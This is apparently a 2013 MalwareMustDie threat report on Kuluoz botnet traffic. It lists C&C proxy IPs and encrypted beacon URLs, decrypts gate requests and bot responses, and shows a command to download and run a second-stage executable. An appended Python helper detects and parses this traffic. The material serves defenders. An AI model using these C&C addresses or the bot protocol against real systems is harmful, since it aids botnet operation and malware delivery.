#MalwareMustDie! Kuluoz #Botnet CnC Unleashed (#Tango )

MalwareMustDie Jul 4th, 2013 1,149 Never
// #MalwareMustDie!!
// @unixfreaxjp /malware]$ date
// Fri Jul  5 00:19:58 JST 2013
// ----------------------------
// Kuluoz botnet communications sniffed TODAY at the below requests from infected PCs:
// During the decryption we found:
   - the second payload request (updates)
   - Kuluoz botnet private botnet networking
   - CnC data.

// Today's requested IP:PROXY from the infected Kuluoz PCs are:

178.208.35.190:8080
186.112.214.158:8080
95.140.42.27:8080
203.146.208.180:8090
202.29.229.232:8080
77.92.140.241:8080

// Locations...

178.208.35.190  NL Greup, Netherlands        51.7862, 4.4377   Combell Group Nv Combell Group Nv combell.com
186.112.214.158 CO Bogota D.C., Colombia,    4.6492, -74.0628  Colombia Telecomunicaciones S.A. Esp Telecomunicaciones S.A. Esp
95.140.42.27    HU Hungary, Europe           47,      20       Szervernet Ltd. Szervernet Ltd.
203.146.208.180 TH Bangkok, Thailand, Asia   13.754, 100.5014  Loxley Information Company Ltd. CS LoxInfo
202.29.229.232  TH Thailand, Asia            15,     100       UniNet(Inter-university network) Unspecified Uninet-th
77.92.140.241   TR Sanayi, Antalya, Turkey,  36.9031, 30.6991  Hosting Internet Hizmetleri Sanayi ve Ticaret Anon Hosting Internet Hizmetleri Sanayi ve Ticaret Anon sadecehosting.net

// We are recording all requests as per below and decrypting the first three IPs
// for the shutdown purpose

log.txt(31): h00p://203.146.208.180:8090/cxErZ1nDF6A7F10CFB0D822BD6A442451FF7F6C13E44C2E57D87B6E3C4FDA5455DC4011C16648B6036867F2B52C6BF8443D7533EBD2144838C95B4F4482BC08D5B4EDD1C4691FB5D63
log.txt(35): h00p://203.146.208.180:8090/nXFB1CY2D5D2B54A46DA4A63C19398EBEB87C65335ED99145D0CEE49C0217FEFC14537B77AEA61BAA54E88C5EBE8F33BB77218FDB11EB56E0711183A3905A12F33E664D73D09D4ACB5
log.txt(39): h00p://203.146.208.180:8090/CIov24rb5B9F5B4763E27016CD035F7FCDCA75C17EE2437510D5673C1BBD04E514A2F8BCF78EE618D59427B9C1D64C7702F56E7A69CF90AC733C015B07DAC382622AD5CEC22B72F5
log.txt(43): h00p://203.146.208.180:8090/lzPiZZrB235F17B5B261B27A0B483BFCF8FC269CCED21019300F53F8CC2B001AB9C42EAE0F18215FEE292F4F6DDB8090A2EE580697AE14C58321394303890C37B16EC60456E974209D
log.txt(47): h00p://203.146.208.180:8090/YpITvFiK1C9DD8C10860C4EF8AA5F367A003B2DF0129E09E9BD9A6A28B09C9248D9F44173A6FEFBBA539C5A5781B529C1433B229B8706B589FC9442439BC5F6F10F0B5130B34B82244
log.txt(51): h00p://202.29.229.232:8080/EQqpctxY81BBEBAB855D656245D292F4450405BF3E5F9DA980BBAA1FE39850A5C1EB435EF5684CD7B340C1F196455C2DE68F9DEBBD41DEEED2FED66B450CAD1C02E178E68992FB2EF5
log.txt(56): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644431D0549A1B0A0011DFEEF4BA360F49376697385C600F92A740674C6051F2DE786376D235BAD61A0B932C3F5D7412FBDE036393AB
log.txt(61): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644438DE55D34B3B471ED0CED0F8790C066152D3660A046EC7
log.txt(84): h00p://95.140.42.27:8080/WvvUBQ610EC76E893E8D01859561D313435808245F1ED6F2078FEB3E6D78D5050CB189D770B7E66D7B57073F9F6BC6C4A3113A53C8EA8A147B1D261B9AB5D85616CF8371C55C773487
log.txt(96): h00p://95.140.42.27:8080/Yki83XNuEC0BE99C56D912EC410C5E3A11885312593832807508530DCAA6F5DB3D9A902B14B324B66B5B80656E4E60AE09BBF92475FFF25887E3F2FC1F7FD8B5B451E622CAF747F69C
log.txt(101): h00p://95.140.42.27:8080/pjuR8A3eFC05C3D6062AB6DBF00A15A2B1389FAE53CADA146201712150B54E732C57336FEA8CC7A085C0D8963E732FC563557FCF5BD589B67162E97054706912876624996AE68DB8
log.txt(106): h00p://95.140.42.27:8080/tJcKoBSsEDE95904DB7FA2B3EFA8124C03C088C58D1910B95E39D149B6A34BFD842DF390C5A03DAC33929DAE
log.txt(140): h00p://186.112.214.158:8080/L2ZynNQhCABAA843114F2B108A1AA560C7234B4E68D1601E9EF77D90C75275B75E62DAE5EC9B2AB4B545AAC02F808CCF19AD2574E0E6DD53D653D7AE53618586299C84AA89C74AD16F
log.txt(144): h00p://186.112.214.158:8080/dWguhErv004DE435B7C67DB5F8B98F4B6187D6CD771F89A31173BBDE27DED967C13A9606E7EA2872B66E03A40F394FE29EEE6B9B59FDC3E1B31BC60EF0EDD795356D008FE5BD4D6F88
log.txt(148): h00p://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F51ABA24B842F6FD4C012F50CB5A9FE73C9CECAEDF5C6893C390FF9E55D118AA0EC7855F5DAADCFA6869393BBE189DC62B3B80CE8
log.txt(152): h00p://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F58A5A302812F7FCEFE0EF641FAAAB170CCDD818AAD80D3
log.txt(175): h00p://186.112.214.158:8080/oU9HTVxTEC2C2A72BFBB8455F713402CB0874EC7BE9A5DB58E36C391E9D0CB9E579040C3894BCF121DDF6BC9

// Decryption Report

===============================
178.208.35.190  NL Greup, Netherlands
===============================

// Kuluoz HTTP Botnet Requests sent are:

http://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644431D0549A1B0A0011DFEEF4BA360F49376697385C600F92A740674C6051F2DE786376D235BAD61A0B932C3F5D7412FBDE036393AB
  // decrypted → /index.php?r=gate&id=9A4cfSPd&group=0711rcm&debug=0&ips=192.168.0.128
  // response:    c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=8e2275d02cfbbddf623f60394bb71926
  // 2nd payload: /get/e0e989581b9ab693e0424fe419a17399.exe

http://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644438DE55D34B3B471ED0CED0F8790C066152D3660A046EC7
  // decrypted → /index.php?r=gate/getipslist&id=9A4cfSPd
  // response:

0000   87 1B 41 CC 5B 44 86 DC 10 0C 71 83 46 EF C3 29    ..A.[D....q.F..)
0010   18 24 B3 09 92 0C 7A 00 42 97 89 96 F0 22 5F 01    .$....z.B...."_.
0020   60 23 DF 35 66 66 06 95 FB 12 3B 58 2A 06 A1 9F    `#.5ff....;X*...
0030   31 6F 73 CC 66 F2 95 1F 0A A0 29 26 42 7B 18 FB    1os.f.....)&B{..
0040   DF 19 62 8F A1 D3 0D E4 01 E0 69 6D D6 BE 29 BB    ..b.......im..).
0050   3F F7 3B 88 82 31 47 A1 2B A7 84 19 CE E8 E2 76    ?.;..1G.+......v
0060   7E AE 30 CB 79 AD 74 2C F7 43 5E EB BC 90 1A 7B    ~.0.y.t,.C^....{
0070   83 16 94 7F 87                                     .....

// response decrypted, and the data are the CnC lists of this session's Kuluoz...

149.210.130.18:993
95.140.42.27:8080.
186.112.214.158:8080.
77.92.140.241:8080.
202.29.229.232:8080.
178.208.35.190:8080.

===============================
95.140.42.27 Szervernet Hungary
===============================

// Kuluoz HTTP Botnet Requests sent are:

http://95.140.42.27:8080/WvvUBQ610EC76E893E8D01859561D313435808245F1ED6F2078FEB3E6D78D5050CB189D770B7E66D7B57073F9F6BC6C4A3113A53C8EA8A147B1D261B9AB5D85616CF8371C55C773487

   // decrypted (RAW):
      2f 69 6e 64 65 78 2e 70 68 70 3f 72 3d 67 61 74  /index.php?r=gat
      65 26 69 64 3d 57 76 76 55 42 51 36 31 26 67 72  e&id=WvvUBQ61&gr
      6f 75 70 3d 30 37 31 31 72 63 6d 26 64 65 62 75  oup=0711rcm&debu
      67 3d 30 26 69 70 73 3d 31 39 32 2e 31 36 38 2e  g=0&ips=192.168.
      30 2e 31 33 37                                   0.137

  // decrypted → /index.php?r=gate&id=WvvUBQ61&group=0711rcm&debug=0&ips=192.168.0.137
  // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991

http://95.140.42.27:8080/Yki83XNuEC0BE99C56D912EC410C5E3A11885312593832807508530DCAA6F5DB3D9A902B14B324B66B5B80656E4E60AE09BBF92475FFF25887E3F2FC1F7FD8B5B451E622CAF747F69C

  // decrypted → /index.php?r=gate&id=Yki83XNu&group=0711rcm&debug=0&ips=192.168.0.128
  // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991

http://95.140.42.27:8080/pjuR8A3eFC05C3D6062AB6DBF00A15A2B1389FAE53CADA146201712150B54E732C57336FEA8CC7A085C0D8963E732FC563557FCF5BD589B67162E97054706912876624996AE68DB8

  // decrypted → /index.php?r=gate&id=pjuR8A3e&group=3006rcm&debug=0&ips=192.168.0.58
  // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=733b75728281f1afbe32f725aecf0991

http://95.140.42.27:8080/tJcKoBSsEDE95904DB7FA2B3EFA8124C03C088C58D1910B95E39D149B6A34BFD842DF390C5A03DAC33929DAE

   // response (RAW):
      0000   F3 B4 0E 4E 8C 36 BC ED B6 EB 1D 10 0F 9F D3 88    ...N.6..........
      0010   D1 05 7D E5 1F 7E 90 0E EA E4 0C BB 8C 76 A0 97    ..}..~.......v..
      0020   89 DA 66 D7 56 E1 F6 EB 69 96 24 47 4E 51 E3 AF    ..f.V...i.$GNQ..
      0030   4D 74 C5 EE 03 6D 2C D0 9A 8E D2 39 8E 55 69 63    Mt...m,....9.Uic
      0040   5D 85 F7 69 E3 D5 50 3A 84 A7 72 72 D8 8B 0A 39    ]..i..P:..rr...9
      0050   2C 1B 76 30 51 BA 6F 4F 13 10 D2 D9 3E 2F 4A 81    ,.v0Q.oO....>/J.
      0060   F6 91 A8 2D 0C 99 C0 71 06 D3 E6 BD E1 07 89 F4    ...-...q........
      0070   19 99 2C F0 C4 51 B2 C8 D6 55 01 5E 3A 13 CB 92    ..,..Q...U.^:...
      0080   8E E0 1F 1A 1D 58 A5                               .....X.

   // decrypted (RAW):

      31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39   149.210.130.18:9
      39 33 0a 39 35 2e 31 34 30 2e 34 32 2e 32 37 3a   93.95.140.42.27:
      38 30 38 30 0a 31 38 36 2e 31 31 32 2e 32 31 34   8080.186.112.214
      2e 31 35 38 3a 38 30 38 30 0a 37 37 2e 39 32 2e   .158:8080.77.92.
      31 34 30 2e 32 34 31 3a 38 30 38 30 0a 32 30 32   140.241:8080.202
      2e 32 39 2e 32 32 39 2e 32 33 32 3a 38 30 38 30   .29.229.232:8080
      0a 31 37 38 2e 32 30 38 2e 33 35 2e 31 39 30 3a   .178.208.35.190:
      38 30 38 30 0a 36 32 2e 31 31 33 2e 32 30 30 2e   8080.62.113.200.
      39 35 3a 39 39 33 0a                              95:993.

  // decrypted response shows CnC data....
     149.210.130.18:993
     95.140.42.27:8080
     186.112.214.158:8080
     77.92.140.241:8080
     202.29.229.232:8080
     178.208.35.190:8080
     62.113.200.95:993.

===================================================
186.112.214.158 ColombiaTel Bogota D.C., Colombia
===================================================

// Kuluoz HTTP Botnet Requests sent are:

http://186.112.214.158:8080/L2ZynNQhCABAA843114F2B108A1AA560C7234B4E68D1601E9EF77D90C75275B75E62DAE5EC9B2AB4B545AAC02F808CCF19AD2574E0E6DD53D653D7AE53618586299C84AA89C74AD16F
  // decrypted → /index.php?r=gate&id=L2ZynNQh&group=0711rcm&debug=0&ips=192.168.0.128
  // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512

http://186.112.214.158:8080/dWguhErv004DE435B7C67DB5F8B98F4B6187D6CD771F89A31173BBDE27DED967C13A9606E7EA2872B66E03A40F394FE29EEE6B9B59FDC3E1B31BC60EF0EDD795356D008FE5BD4D6F88
  // decrypted → /index.php?r=gate&id=dWguhErv&group=0711rcm&debug=0&ips=192.168.0.128
  // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512

http://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F51ABA24B842F6FD4C012F50CB5A9FE73C9CECAEDF5C6893C390FF9E55D118AA0EC7855F5DAADCFA6869393BBE189DC62B3B80CE8
  // decrypted → /index.php?r=gate&id=lpcvWowk&group=0711rcm&debug=0&ips=192.168.0.133
  // response (2nd payload): c=run&u=/get/e0e989581b9ab693e0424fe419a17399.exe&crc=cbca008e4bc329beb3567020a8d54512

http://186.112.214.158:8080/lpcvWowk243A89131B397A6CC392CA8725FC67F01F58A5A302812F7FCEFE0EF641FAAAB170CCDD818AAD80D3
  // decrypted → /index.php?r=gate/getipslist&id=lpcvWowk
  // response:
  0000   3A 67 DE 59 4C 70 64 32 9A D1 C5 DB 29 A3 3C BD    :g.YLpd2....).<.
  0010   43 44 C8 FF 43 C6 6E 38 92 B9 49 B0 49 A1 F9 B6    CD..C.n8..I.I...
  0020   24 8C 86 C7 D7 F3 CF 8E 60 6B 53 ED AF 0A 42 CB    $.......`kS...B.
  0030   E9 E0 7D 4B A6 92 EE CA A7 B5 96 8A A4 EE 83 DC    ..}K............
  0040   63 A9 B9 11 E9 59 7C 3A 2F EA 6A F3 AB A5 1B 28    c....Y|:/.j....(
  0050   EC D1 9F 05 E4 5A D9 23 CA 5F 33 32 F2 CB A2 A0    .....Z.#._32....
  0060   29 45 4B BF 8E 0C 49 2D 6A 72 32 E5 AB EF 26 30    )EK...I-jr2...&0
  0070   77 82 62 45 C4 84 F6 98 C5 2D C9 B7 14 2E 86 5A    w.bE.....-.....Z
  0080   8F F7 EB 57 7F F5 28                               ...W..(

  // decrypted response shows CnC data....
  149.210.130.18:993
  95.140.42.27:8080
  186.112.214.158:8080
  77.92.140.241:8080
  202.29.229.232:8080
  178.208.35.190:8080
  62.113.200.95:993.


http://186.112.214.158:8080/oU9HTVxTEC2C2A72BFBB8455F713402CB0874EC7BE9A5DB58E36C391E9D0CB9E579040C3894BCF121DDF6BC9
  // decrypted → /index.php?r=gate/getipslist&id=oU9HTVxT

  // response:
  0000   F2 71 7D 38 E8 F2 9A 0B AE 50 4F 70 BC D8 15 8A    .q}8.....POp....
  0010   E2 86 30 E9 CF 71 82 D6 B5 97 8C D8 5F CB 13 C4    ..0..q......_...
  0020   DE 2E CE 6A 43 B8 2B AB BD 24 D1 EA 17 B5 4A E4    ...jC.+..$....J.
  0030   D1 73 3C 40 EA 7A 87 D4 25 3C 8C BB 36 DB FB B1    .s<@.z..%<..6...
  0040   C1 0D 23 A5 55 BF 2A EF 95 F3 AD ED F0 11 5D 26    ..#.U.*.......]&
  0050   01 C6 14 7B 4F 8A DA 55 69 4C 73 2B DF B8 6B 53    ...{O..UiLs+..kS
  0060   5F 5F 44 7D BA 2C F1 83 EC 0F F5 38 D6 B8 53 00    __D}.,.....8..S.
  0070   BC BF B2 94 9B 8B E9 80 A8 30 BE 0A 4C 9B 53 96    .........0..L.S.
  0080   33 6C 5A 00 46 6B D8                               3lZ.Fk.

  // decrypted response shows CnC data....
  149.210.130.18:993
  95.140.42.27:8080
  186.112.214.158:8080
  77.92.140.241:8080
  202.29.229.232:8080
  178.208.35.190:8080
  62.113.200.95:993.


// Verdict as per the evidence above:
// please help to shut down or block this malicious traffic.

---
#MalwareMustDie!!!
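Added example, not part of the original paste or MalwareMustDie's tooling: a small Python helper for picking this Kuluoz gate traffic out of plaintext proxy logs and for splitting the decrypted exchanges into fields. It relies on two shapes visible above: the encrypted request path starts with the 8-character bot id in clear (e.g. 9A4cfSPd) followed by a hex blob that is exactly twice the length of the decrypted path (138 hex chars for the 69-byte gate beacon, 80 for the 40-byte getipslist request), and the getipslist response decrypts to a newline-separated ip:port list. The regex and the log-line format are assumptions; no decryption is attempted.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed shape of an encrypted Kuluoz gate path: 8 alphanumeric id chars in clear, then a
# hex blob. One ciphertext byte per plaintext byte, so len(blob)//2 is the decrypted length.
KULUOZ_PATH_RE = re.compile(r"^/(?P<id>[A-Za-z0-9]{8})(?P<blob>[0-9A-Fa-f]{40,})$")

def classify_url(url):
    """Return (host, port, bot_id, plaintext_len) for a Kuluoz-shaped URL, else None.
    Accepts the defanged 'h00p://' scheme used in the paste. Heuristic only: a benign
    URL made of an 8-char name plus a long hex string would match too."""
    u = urlsplit(re.sub(r"^h00p://", "http://", url))
    m = KULUOZ_PATH_RE.match(u.path)
    if m is None:
        return None
    return u.hostname, u.port, m.group("id"), len(m.group("blob")) // 2

def scan_log(lines):
    """Pick Kuluoz-shaped requests out of lines of the form 'log.txt(N): URL' (assumed)."""
    hits = []
    for line in lines:
        hit = classify_url(line.split(": ", 1)[-1].strip())
        if hit:
            hits.append(hit)
    return hits

def parse_gate_request(decrypted):
    """Fields of a decrypted '/index.php?r=gate...' request (r, id, group, ips)."""
    q = {k: v[0] for k, v in parse_qs(urlsplit(decrypted).query).items()}
    return {"route": q.get("r"), "id": q.get("id"), "group": q.get("group"), "lan_ip": q.get("ips")}

def parse_gate_response(resp):
    """Fields of a 'c=run&u=/get/...exe&crc=...' second-payload instruction."""
    return {k: v[0] for k, v in parse_qs(resp).items()}

def parse_ipslist(plain):
    """Decode the newline-separated ip:port list returned for r=gate/getipslist."""
    out = []
    for line in plain.decode("ascii").splitlines():
        if ":" in line:
            ip, port = line.strip().rsplit(":", 1)
            out.append((ip, int(port)))
    return out

# Constructed sample input: two URLs copied from the paste's log excerpt plus one benign line.
SAMPLE_LOG = [
    "log.txt(56): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644431D0549A1B0A0011DFEEF4BA360F49376697385C600F92A740674C6051F2DE786376D235BAD61A0B932C3F5D7412FBDE036393AB",
    "log.txt(61): h00p://178.208.35.190:8080/9A4cfSPd994616860C0D9882494F7EDF4AB098644438DE55D34B3B471ED0CED0F8790C066152D3660A046EC7",
    "log.txt(62): http://example.invalid/index.html",
]
# The decrypted getipslist response reproduced from the paste's hex dump.
IPSLIST_PLAIN = (b"149.210.130.18:993\n95.140.42.27:8080\n186.112.214.158:8080\n77.92.140.241:8080\n"
                 b"202.29.229.232:8080\n178.208.35.190:8080\n62.113.200.95:993\n")
```

Feeding the decrypted beacons through parse_gate_request lets you group infected hosts by the `group` campaign tag (0711rcm, 3006rcm) and their LAN address, while scan_log flags the encrypted form before any decryption.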